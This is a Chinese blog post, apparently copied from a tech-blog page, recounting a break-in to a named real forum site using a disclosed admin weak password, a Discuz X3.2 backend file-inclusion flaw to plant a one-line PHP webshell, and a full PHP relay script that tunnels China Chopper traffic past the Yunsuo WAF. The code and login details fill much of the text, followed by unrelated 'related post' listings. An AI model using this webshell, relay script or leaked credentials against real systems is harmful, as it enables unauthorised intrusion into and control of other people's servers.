直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer

进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可怜的用户数量来看,未打补丁的可能性比较大,那就尝试getshell吧,参考WooYun: Discuz3.2后台文件包含漏洞可后台拿shell具体操作过程就不啰嗦了,这里面有个小细节,一定要把服务器具体IP添加到本地host里面去,否则云锁waf会拦截的(至于怎么获得具体IP,最简单的是发送邮件测试)通过后台“文件检验”功能,我们能清楚的看到一句话文件成功生成了

我们浏览器访问看看

被云锁waf拦截了,估计菜刀肯定也连不了

果不其然,也被拦了,乌云zone翻了下前辈们的经验之谈,终于突破了,重点请往下看1、变形一句话

$_REQUEST['a']($_REQUEST['b']);

?>

1

2

3

$_REQUEST['a']($_REQUEST['b']);

?>

按上面getshell的方法重新将一句话写入根目录,得访问地址http://bbs.sudu.cn/help.php测试一下http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();

2、新建shell.php,填入菜刀中转脚本

$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址

$poststr='';

$i=0;

foreach($_POST as $k=>$v)

{

if(strstr($v, "base64_decode"))

{

$v=str_replace("base64_decode(","",$v);

$v=str_replace("))",")",$v);

}

else

{

if($k==="z0")

$v=base64_decode($v);

}

$pp=$k."=".urlencode($v);

//echo($pp);

if($i!=0)

{

$poststr=$poststr."&".$pp;

}

else

{

$poststr=$pp;

}

$i=$i+1;

}

$ch = curl_init();

$curl_url = $target."?".$_SERVER['QUERY_STRING'];

curl_setopt($ch, CURLOPT_URL, $curl_url);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($ch);

curl_close($ch);

echo $result;

?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址

$poststr='';

$i=0;

foreach($_POSTas$k=>$v)

{

if(strstr($v,"base64_decode"))

{

$v=str_replace("base64_decode(","",$v);

$v=str_replace("))",")",$v);

}

else

{

if($k==="z0")

$v=base64_decode($v);

}

$pp=$k."=".urlencode($v);

//echo($pp);

if($i!=0)

{

$poststr=$poststr."&".$pp;

}

else

{

$poststr=$pp;

}

$i=$i+1;

}

$ch=curl_init();

$curl_url=$target."?".$_SERVER['QUERY_STRING'];

curl_setopt($ch,CURLOPT_URL,$curl_url);

curl_setopt($ch,CURLOPT_POST,1);

curl_setopt($ch,CURLOPT_POSTFIELDS,$poststr);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$result=curl_exec($ch);

curl_close($ch);

echo$result;

?>

3、本地搭建php环境,将中转脚本置于中,菜刀中连接,地址处填http://127.0.0.1:8004/shell.php?a=assert 密码处填b

成功突破,如图

过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)相关推荐

  1. 华夏名网:云主机的高性能和低价格可以兼得

    2012年对于中国云主机来说犹如蛟龙飞腾直上,从亚马逊.阿里.盛大到万网.华夏名网及其它中小服务商,纷纷发布云计算主机产品,一派欣欣向荣,非常热闹,但参差不齐让用户眼花缭乱. 在我们普通人看来云计算似 ...

  2. 华夏名网十周年盛大感恩优惠活动

    不知不觉中,华夏名网(www.sudu.cn)已经走过了十年.回首往昔,历历在目. 2002年,华夏名网正式成立,成为中国首批基础服务商家之一; 2004年,成为西部首家提供vps主机的服务商;200 ...

  3. 从华夏名网的营销到中国IDC行业的诚信

    中国的IDC行业有诚信吗?这个问题我不置可否,请大家一边看一边思考.其实可能大家不看都已经有自己的答案,因为略有些经验的站长都经历过以下这些事情: 1.NND的空间都没几个人访问,就被告知资源超载,整 ...

  4. 11月初中国域名商解析量TOP13:华夏名网榜尾

    IDC评述网(idcps.com)11月06日报道:根据DailyChanges公布的实时数据显示,截止至2015年11月02日,国内域名解析市场基本稳定,前十三强域名商排名与上期10月27日一致.其 ...

  5. 华夏名网虚拟主机如何导入mysql/mssql数据库,怎样自已导入数据到华夏名网数据库

    华夏名网虚拟主机如何导入mysql/mssql数据库,怎样自已导入数据到华夏名网数据库 华夏名网代理客服losoon经常帮用户导数据和数据库,现总结一点经验,为更多的华夏名网用户提供方便,如何自已导入 ...

  6. 华夏名网Discuz虚拟主机论坛空间推荐

    华夏名网第7代Discuz虚拟主机 <- 利用 Discuz! 站长能够在最短的时间内,花费最低的费用,采用最少的人力,架设一个性能优异.功能全面.安全稳定的社区论坛平台.华夏名网Linux主机 ...

  7. 为什么华夏名网的主机搭建的wordpress博客申请了SSL证书并安装really-simple-ssl不成功导致网站内页不能正常显示?

    为什么华夏名网的主机搭建的wordpress博客申请了SSL证书并安装really-simple-ssl不成功导致网站内页不能正常显示? 我的博客是华夏名网的虚拟机搭建的wordpress博客申请了S ...

  8. 华夏mysql新建数据库_华夏名网虚拟主机不通过phpMyAdmin,将.sql备份导入MySQL数据库的方法...

    将.SQL数据库备份文件导入MYSQL数据库 1.登录 "会员中心"->"产品管理"->"我的主机"->"管理& ...

  9. [快讯]爱名网云主机机房故障2天 上万站长网站无法访问

    IDC评述网(idcps.com)05月05日报道:据大量网友反馈,域名注册与中介交易商"爱名网"于5月3日开始,云主机服务器所在机房电源出现紧急故障,导致很多主机用户的网站无法访 ...

最新文章

  1. 用户名字符串和密码字符串登录验证
  2. java 和equals_java中的==和equals()
  3. 新晋小白怎样才能做好seo优化
  4. python 中给文件加锁——fcntl模块
  5. python主要用于系统编程_一文带你了解python是什么?能做什么?为什么(附赠40G项目实战+绝版电子书)...
  6. 魔兽世界美服部落人数最多服务器,魔兽世界全球服务器最新人口普查,其实并没有你想象的那么少...
  7. hashmap7源码浅析及与hashmap8的比较
  8. 了解华为HCIP认证
  9. xp大容量u盘补丁_老电脑上大硬盘补丁
  10. Java程序开发工具 JCreator
  11. 在手机上共享屏幕,更专业的远程协助软件
  12. PCI-E x1/x4/x8/x16四种插槽区别是什么?具体有什么作用?
  13. Photoshop之通道抠图,适用于扣人像,树叶等细微抠图
  14. 标准误 Standard error 简单解释
  15. java对excel进行加密_用poi-3.6-20091214.jar 实现java给excel资料加密
  16. 目前最新android处理器排行榜,2016上半年安卓手机处理器排行:骁龙820无意外夺冠...
  17. spark实践-淘宝双十一数据分析与预测
  18. java 上传文件-生成文件首页缩略图 生成pdf 抓取图片
  19. android 源码下载
  20. 密室逃脱1深红色房间

热门文章

  1. 梦幻西游进入游戏显示服务器程序停止工作,Windows7系统提示“梦幻西游已停止工作”如何解决...
  2. 暴风影音遭攻击:六省区电信网络大瘫痪
  3. 织梦php模板安装教程,新手必读:原版织梦模板DEDECMS整站源码通用安装教程
  4. LOL班德尔城服务器位置,英雄联盟世界地图符文之地上线 找不到班德尔城竟然是官方玩笑?...
  5. 数据时代,为大家介绍四种非常好用的 app 数据分析 工具
  6. matlab模拟晶粒生长,matlab模拟晶粒长大?
  7. 华硕fx53vd 键盘_华硕FX53VD怎么保存BIOS设置?麻烦具体说一下。
  8. KV数据库是怎样支持SQL语句的
  9. 综合理解CFS、CTFT、S;DFS、DTFT、DFT、Z
  10. 水位尺读数识别 python_一种基于人工智能识别水尺水位的方法与流程